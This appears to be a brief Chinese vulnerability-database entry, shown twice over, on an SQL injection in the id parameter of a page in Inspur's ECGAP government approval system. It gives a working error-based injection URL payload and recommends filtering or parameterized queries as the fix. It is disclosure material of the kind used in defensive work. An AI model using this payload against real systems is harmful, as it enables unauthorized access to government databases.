VULHUB ™

###0x01漏洞简介 浪潮ECGAP政务审批系统在页面/Broadcast/displayNewsPic.aspx的参数id存在注入漏洞，远程攻击者可以利用回显报错等方式执行SQL指令。 ###0x02漏洞利用 ``` http://**.**.**.**/Broadcast/displayNewsPic.aspx?id=00187/**/and/**/1=user ```  ###0x03修复方案 过滤，或者使用参数化的SQL语句。

###0x01漏洞简介 浪潮ECGAP政务审批系统在页面/Broadcast/displayNewsPic.aspx的参数id存在注入漏洞，远程攻击者可以利用回显报错等方式执行SQL指令。 ###0x02漏洞利用 ``` http://**.**.**.**/Broadcast/displayNewsPic.aspx?id=00187/**/and/**/1=user ```  ###0x03修复方案 过滤，或者使用参数化的SQL语句。